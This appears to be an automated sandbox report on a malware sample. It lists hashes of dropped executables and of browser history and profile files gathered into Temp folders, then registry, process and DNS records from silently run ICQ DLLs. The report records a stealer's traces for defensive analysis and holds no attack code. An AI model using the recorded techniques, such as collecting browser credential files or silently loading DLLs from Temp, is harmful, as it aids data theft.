SHA512 05015a4de5b285db5ca00fe1814b0924d82a2056bc18882a84a79d52d2d154e103d6c334a8e684fb97a3babb826eff75921dce3bda5131f0aa955cde588f8d0b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 5947a819c7aba7f2fe52587b27964725
SHA1 fa7819d152c5a86ff00f84c6d79390ba1d5a7d58
SHA256 4f6c1ec0a3bd62c40f73cd5d371a751a2cfe94cb74fbfae5e51582e60c18314e
SHA512 ad8dc726130753c3a743420977a976832abb8c97b74c3c2d78732554d7410a9686a6e0fc5f57c413129bfa39162cefb3561cc91fdd7f62e78200f4f5a4e1dcb4

C:\Users\Admin\AppData\Local\Temp\heidiZzOs_nAUVEVs\IWPfiAXUTJTSHistory

MD5 8a49e4add610fc0790f1d6c81c5a5e95
SHA1 5248fa5f4348bc7e2062751fc3041cfd67bc9466
SHA256 7b7f2c7b9eaaeaeaec977105124020f6bb1aaada47f7bd03f05b7ba7f2cb12ee
SHA512 8cda64af3ab4aeda7d2bcc61a5b30773a0cb6051805032cd1af664a901dd85cd297b19a09036ed45edf6fa4f0b29a6c5dc0a471e4ac359b852ba5de0e83f2124

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 276b2496cb8c35dea836bbb859836f9d
SHA1 d6d48fc6b9779eb2fd12897982efea6e0d54ca05
SHA256 7b2f581a025f55c3e0c091522943e0f5a8dacec497dcd9b88073ad2b9c6814ca
SHA512 f6958d0812d1b3043d12bbcb88d1e04498395289576ff6047e91ebb6a2c3cb0309b22a3fa1a3ac17529d8c8102ae0c56965c95f816bae1b9e90631d32c3eb270

C:\Users\Admin\AppData\Local\Temp\adobeZzOs_nAUVEVs\information.txt

MD5 814236b2078e4334d720863e38c8dd8b
SHA1 75761f2b44d377c6b01bf99ce1a7bafd028edc94
SHA256 7bc8e58a2a16755a0047800466dbe7c5e6cd2990d6369450d78ea7681f2a19c7
SHA512 163f7eded649bb6cc4c3098e55d69a952da6633af3b8f987fe79dc7a3f56364ff10d00f201e064fc373c6e8d473e9957a98a914b378be3ddcc333eef2d23899a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8450df0e01d5d741adc38dcc0a781ac4
SHA1 336a501cf592823458461584454b8db2ef418048
SHA256 7b12b5c07c1b36a3e5136427ad51ce730317c691dbfd4a03b456e1de8858f1c2
SHA512 5c9bccf6556eea4a68f4b10408a3f48be20bae9a4077068faf99a4cfb3a1d208bc18042e3867ff2a90eab5e34cabc58a55011914f1e3414180a55b8231d8b980

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zlzu656s.default-release\sessionstore-backups\recovery.jsonlz4

MD5 55ebe9044e9d7d3c9a626e6bc80c07f6
SHA1 9c414f858a77b6f984aac3e0ec0dd5858114dedd
SHA256 402dae28355d407e03146ba686dcc671ed73770312a6710f3602cac15a64aaaa
SHA512 b6dfc9ae53b2d74c8568658cc947aecbe39437574b2f651e5aea1124ba1d678f6f0551a3cf69d1b9ac6f386dcfc0242e36c96c0817a959404d81c67297e3ac83

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 bbc4689fa0f375b22862a94231704da4
SHA1 62baa6b4fede6d041d96a1ea53a718ac0fe73c0c
SHA256 15b7de58400826baacc7370e1dbbc1900cc86a536f69200f06552e4d0b97c9c6
SHA512 8f44f55f0dc281d629b6055f878caa8e261d05a5e315a0b224dd8f9395ca68b6b413213da25059a2275003ced37a4c8bdaad1acd90bd1dda796d171e9f14368d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a381cf779a51dd858ad7ea9c8bde057f
SHA1 2cff2380790c881da05389737f041fb88784d934
SHA256 182c1f93cb72b5ecb2f07f983c593d33a221c000ea55aff38e9e632770e76b76
SHA512 02a476a13236fee05e199a9b9ed622dad7e5b2a461a44ebba48916d9acb989e213c11cd1c31aa707c12e0c3eb2e389704693af9d0bc99392854d84f1a57f376c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 761f50516425004feead0d4054b3e3ef
SHA1 8e4349aa7dd43bea087ebc92caf17415b75f318c
SHA256 617db72d2af8af17e2a2dbca6d633d1a0378836dbf1cb61012d2efef65d7bbd9
SHA512 78c6c5ca69a51f9109cbf5beca4f7fd623ff92aa2a0cb5013b1ab31c98667dd417f97db8de7946b8974237b945313bde71995cff3f648493c170dc1a9cf469a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 8445d2ea307d49d71243d9d2016bc838
SHA1 3b88593c19c3b133cfd9a3132561a82f391da512
SHA256 e205da8708f8ddbc21d1977a11a7427de877948f2cebfbd22f4f13fdb5318664
SHA512 485dfc7bbf2edf2eb88be28390adc0be8bb31c5fe770802efcc19587212496d1a43914a9374e7449647d9e9685fcea72845e2b7d73febc3a72fd4cb854b80354

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 8c9607a8c8359d15ec05a327be0b80a8
SHA1 645ef703da82d57f169789d42c5c88625548bcc1
SHA256 924f06d5c5dfa4ac57ea02f3899d9e083a61844d3e86372fc5d71e0e184df233
SHA512 60880b8445341e3ad208977d2d328e497243dc6d5d51dc6a35923752f83cc8e621d6ca377d8638ef4415689f6e74e230bfa8a29953d639a5757bdf94a8d5dda1

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 60026a97e125acc0f980a8dfbd4329a8
SHA1 67a2c69e1f46da1ea1f9eed7bbf96473f7044ae0
SHA256 03e839ea53665093be53ec40c14f397924e3121fc4dfe7db08307d0873c64c4c
SHA512 5c8461c9e7c5502ac16087896b813819b83f91c66b4b85e2bc426487df12c7bb3ec4aa4c2f66323d9e2470b6e6ee453b1701711aac879d64dd08e27eba99c551

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 2894bac8eef6977463a9b6b2b4ebfb45
SHA1 24e371157c3114cd29a54cd635ddb884046a3f6b
SHA256 d880568ca69cbd902df113d63331abce86cc5f454ceadac09c5cee53942a5762
SHA512 903c63b84eb3f5c8dabe8e95388779fb50408eb58f80c8fdbfaec363fdaaff921089d00c117636304eaa2602c76ed53667472c6a983e9fcfd19d1b8b103a92a6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zlzu656s.default-release\prefs-1.js

MD5 bca329aa9dc70e3581697fbe0537733a
SHA1 9e318a3e3b1c62aab43a45501a62e810e9495941
SHA256 70d7549da3d0c0bfda97da6bf8ac66334b1b01bae48788e151b7ce635a3889cb
SHA512 927137534dd1e7b42b1ae7704f1f8d0ca76ac7024b1c0d866efbfc85cded23a849f6f6f51d8ac8851c16be04738dfeb82ecda5bc98b2b1472fda1b6b2efc71e7

C:\Users\Admin\AppData\Local\Temp\nsp811E.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

148s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

90s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1188 -ip 1188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 181.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A